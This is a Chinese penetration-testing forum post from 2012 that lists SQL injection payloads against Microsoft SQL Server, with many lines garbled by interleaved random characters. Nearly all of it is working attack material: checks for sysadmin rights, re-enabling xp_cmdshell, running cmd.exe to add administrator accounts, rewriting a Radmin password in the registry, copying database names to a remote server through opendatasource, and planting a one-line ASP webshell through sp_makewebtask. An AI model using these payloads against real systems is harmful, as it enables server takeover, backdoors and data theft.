中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令
6 O$ C+ Q6 p- x8 g/ K& r" \//看看是什么权限的3 ^& T. q+ {% V7 s+ m
and 1=(Select IS_MEMBER('db_owner'))4 g, ~$ x( M$ X& O- B. m
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
& Y# n  f; P) r. r* o+ X% d1 k; a; |5 d
//检测是否有读取某数据库的权限
' ?# z: u9 L; l5 e7 Vand 1= (Select HAS_DBACCESS('master'))7 P9 G5 w% m: v) q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --) L8 Q" f- c6 |1 e6 ]$ X. P

1 G& N+ w+ G$ g$ N% a
3 o/ W9 Z1 `8 g* S3 s4 H数字类型7 d9 M4 X! {% t7 S
and char(124)%2Buser%2Bchar(124)=09 E6 G& C( j/ ~. [, w: f8 u

! S: v: e  Q: G$ r字符类型8 ~! N( r; e( F; \
' and char(124)%2Buser%2Bchar(124)=0 and ''='
" x$ t6 \' k- C; m$ }+ M0 M( O. c- {1 Q; u* X; c
搜索类型" V1 S5 l, ~% i" P, s/ b8 z
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. o; f: O: u) j. q, j& u1 _% h2 |1 E. S7 B
爆用户名
2 X; [6 y& Q! mand user>06 m; @# @+ b/ N0 S0 o" k/ Y) {* B
' and user>0 and ''='
4 R1 V$ ]$ T' C1 ?
; u4 |& i1 W( o1 `- }检测是否为SA权限% i/ Q  E5 F9 D  ~" K
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--) W5 I" |& |- U3 E( Y
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --6 t/ f  t2 K1 w0 [5 L( i2 E+ d

( F3 |: s5 _9 ]# |检测是不是MSSQL数据库7 r+ J  W5 x: e# y! X6 o
and exists (select * from sysobjects);-- 7 w5 [1 p" r' y1 o& w$ e) Y
2 F7 {; V# O* t0 K. A! |8 s
检测是否支持多行
  A2 D, I$ H& H;declare @d int;--
5 V% ^+ b6 E  @6 J" o. L0 Z6 p* I* O2 r/ r5 n1 x4 |/ b/ c
恢复 xp_cmdshell
3 N* b  [/ |# E6 s;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
9 |' ]1 c& l" Z3 v7 _2 _8 D# S& L5 a/ I% ]0 y7 s% \
( w$ P1 u! C. o' C4 m7 L7 H
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 C0 P- Y& B4 @5 V4 m# `6 [1 i' M: B: m/ k' L! T* C
//-----------------------% ]. D: h, F- Z; p8 |9 s
//      执行命令
! k8 E6 i  b! [- d//-----------------------5 }  e# Z4 Z8 k( ]
首先开启沙盘模式:
" q- ]% C; M$ G$ `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',16 k3 A- h" s! W$ i
, s+ R0 e* U1 D+ \6 S
然后利用jet.oledb执行系统命令1 b! o  \9 q. F7 i* u
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')* M# @( t9 Z9 ]* H2 l; l' y8 K
* }5 M  O! p  x, W9 x7 W  ?
执行命令
) w6 i. i+ b, e;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
" a" P! ]1 `7 \5 S! A7 H! O: T) i9 g: `9 [6 v" P
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; l' x. A4 X/ {: ~" l" s6 ^4 U
, I' N) o. R0 d7 V0 R7 U& x& i判断xp_cmdshell扩展存储过程是否存在:8 k7 r5 D$ x* y4 B5 o, L
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 V, j- p! Q+ V0 {

- [- }/ K) c1 Z6 W/ w写注册表  Z6 `# s/ g& j& {
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 Q5 s# Q. a- ~( Y, S$ e9 T+ a
6 _. j' i- _5 kREG_SZ
* e2 `% R% R6 e9 g! J
0 f; y8 l/ x' X' J" I读注册表
- l2 R/ V. ]' i* Z5 N' Dexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'% {! l% @3 x$ a/ k( \8 C

0 D* q1 Q- e6 K) V) n6 C读取目录内容
; s% r7 M; ^9 cexec master..xp_dirtree 'c:\winnt\system32\',1,1) l3 W; {2 i2 C

- m' [2 j+ u6 S$ r7 @6 p
& f) n1 z; K5 R) T数据库备份" ]  H3 {6 l5 v$ ~! T" S* u5 W
backup database pubs to disk = 'c:\123.bak'- e% Y! \- ?( X- R/ c! r

& L; k) R+ o* @8 P/ u+ |' P* t9 p//爆出长度
! I& D0 ~8 @4 ~) n3 P" BAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--% F  u; q1 ~; K6 |
' B3 z) {6 ]4 H, Y
+ P+ _9 l! ]+ |1 Q, K+ M
: o" K; m8 }2 x3 p- ]& ?+ M
更改sa口令方法:用sql综合利用工具连接后,执行命令:
; v- K; Z) x1 ~; U; G# p+ cexec sp_password NULL,'新密码','sa'
" D/ |  z( |6 r, J, w3 P1 v# O& I* V) f( ?5 ?5 z1 x
添加和删除一个SA权限的用户test:* e/ a% o+ W  }4 {' P6 x8 @. `
exec master.dbo.sp_addlogin test,ptlove1 u9 {: m8 H7 p3 f3 x/ p
exec master.dbo.sp_addsrvrolemember test,sysadmin
" ~4 {" `$ m! A0 ^$ s
+ R9 _0 X- r; m& y7 t1 Q5 W+ x删除扩展存储过过程xp_cmdshell的语句: + }6 e1 y  n( q% D6 a
exec sp_dropextendedproc 'xp_cmdshell'7 J* s* E; J2 k+ ?8 M- l
5 ~: ?/ W' Z; H1 u  N' t9 v
添加扩展存储过过程6 [1 j" ~# P" H# Z/ ?2 _# ~2 [
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ; S! }# u) E: _% q4 F
GRANT exec On xp_proxiedadata TO public
$ m  I, }/ }, J' v6 H: i
8 b8 y9 v* C! i8 B* A5 H: H: T4 K+ i- x: ?0 J# w, q$ C) h/ d
停掉或激活某个服务。 $ E6 {& b8 G  U* J) B' A  X: _% P, b

; ^" X  O( T6 B6 ^exec master..xp_servicecontrol 'stop','schedule'
% ]5 u) Q. @& Y7 o4 I9 V& B8 Cexec master..xp_servicecontrol 'start','schedule'; _' b) l" T) U% z9 C5 [7 m

( I" q  e& i1 s. g8 i+ @dbo.xp_subdirs3 q! [. `; `; z, x
/ U. v7 Q0 n! |+ E# `: {( H2 m
只列某个目录下的子目录。
8 @# \9 K4 w# u! K; Txp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp': F' i8 _# q* E

- |. z* V/ ?6 G8 j- @) b7 X# I: Rdbo.xp_makecab( O$ e9 t3 o. p8 V( `  @; N5 `
( E. R9 P4 H4 g2 J/ o7 s) z
将目标多个档案压缩到某个目标档案之内。
1 v+ z5 p. Q4 r7 E所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。$ q  w8 f; G9 o: ~! F

% H/ r6 k  h! l: ?/ w7 }) a! kdbo.xp_makecab! I! d: v8 O$ M1 ^
'c:\test.cab','mszip',1,3 f; O1 m* z/ l3 J
'C:\Inetpub\wwwroot\SQLInject\login.asp',9 f( M0 W; D  p6 W; K, \
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 g  ]& _# B8 L, X& c+ E1 i. l. l/ b9 O4 h
xp_terminate_process
3 M% N8 W# j' ?+ ]. ]* x* r0 S9 r! g, R* y, d
停掉某个执行中的程序,但赋予的参数是 Process ID。% l( R$ B- k$ A& C0 K' C" f
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
% z5 A; m( ~0 S) U6 \6 J) `' v8 M) }+ r& D' \; J* u* U
xp_terminate_process 2484
  T5 }4 |5 i3 t* u
  W* ]) d* L4 _# lxp_unpackcab
  X8 L7 e5 A' }8 m6 P- Y; `) g2 L9 z! k/ I, h+ F
解开压缩档。
" g0 R7 Q& ?+ ]# g8 [1 W. Q( ]" I5 W8 T! g
xp_unpackcab 'c:\test.cab','c:\temp',13 c# A* C' |/ y

' W3 \( k  J1 l* H1 h( e; J7 s# z" A2 y$ z$ O
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 j$ F$ b6 ?* u9 K9 y0 \9 h2 D2 b4 b0 g
create database lcx;
! w8 O: o2 e: A) I2 Q, e. ?Create TABLE ku(name nvarchar(256) null);
+ f  Q' s" A9 kCreate TABLE biao(id int NULL,name nvarchar(256) null);
4 _4 X# j" B* n$ S; E) o( G$ S; t
//得到数据库名5 O- F+ I  o+ z. k
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, ^4 o4 M# E+ B! y6 \, p& w2 C
$ o: }3 Q5 C+ s1 X
6 f! V4 |! ~& j! _. v//在Master中创建表,看看权限怎样) e/ p2 l( z6 z* C% o1 g
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
' [: S4 S! H; e1 T4 C
6 Z2 g; b1 R: W" u" X用 sp_makewebtask直接在web目录里写入一句话马:+ C4 `+ {$ e" [$ k9 _
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ m0 R' m+ x7 M5 N1 ?  B! O* X# z, ]
//更新表内容7 [, I# U! p! L: c- f
Update films SET kind = 'Dramatic' Where id = 123- W1 f, L8 N( n0 y
1 E) Z3 n* F; m2 o3 P- @1 r9 g( V% \
//删除内容+ g6 u" m' `* g: f! u: h* I9 [! }- I
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2